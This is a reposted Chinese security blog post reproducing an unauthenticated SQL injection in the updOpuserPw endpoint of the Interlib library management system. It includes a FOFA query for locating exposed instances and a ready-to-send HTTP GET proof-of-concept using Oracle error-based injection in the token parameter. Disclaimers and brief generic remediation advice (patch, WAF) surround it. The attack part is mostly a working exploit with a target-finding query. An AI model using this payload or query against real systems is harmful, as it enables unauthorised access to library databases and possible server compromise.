漏洞复现 | 图书馆集群管理系统interlib updOpuserPw SQL注入漏洞【附poc】

admin 2024年5月11日13:49:37评论335 views1字数 1160阅读3分52秒阅读模式

免责声明

本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!

一、漏洞简述

Interlib图书馆集群管理系统是全新的第三代图书馆系统,它作为资源共建共享的新的实现形式,打破了各图书馆单位所有,条块分割的局面,将城市图书馆群或高校多个校区的图书馆作为一个整体进行管理,从而能达到资源共建共享、合理配置和图书馆之间互相合作的目的。其updOpuserPw接口存在SQl注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息,例如添加、删除或修改记录,进而控制服务器系统。

漏洞复现 | 图书馆集群管理系统interlib updOpuserPw SQL注入漏洞【附poc】

二、网络测绘

fofa:body="interlib"

三、漏洞复现

SQL报错成功执行取模运算函数

漏洞复现 | 图书馆集群管理系统interlib updOpuserPw SQL注入漏洞【附poc】

四、漏洞检测poc

GET /interlib3/service/sysop/updOpuserPw?loginid=test&newpassword=12356&token=1%27and+ctxsys.drithsx.sn(1,(select%20MOD(9,9)%20from%20dual))=%272 HTTP/1.1Host: 0.0.0.0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

五、漏洞修复

1、建议联系厂商打补丁或升级版本。

2、增加Web应用防火墙防护。

免责声明

本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!

原文始发于微信公众号(实战安全研究):漏洞复现 | 图书馆集群管理系统interlib updOpuserPw SQL注入漏洞【附poc】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月11日13:49:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 | 图书馆集群管理系统interlib updOpuserPw SQL注入漏洞【附poc】https://cn-sec.com/archives/2729535.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息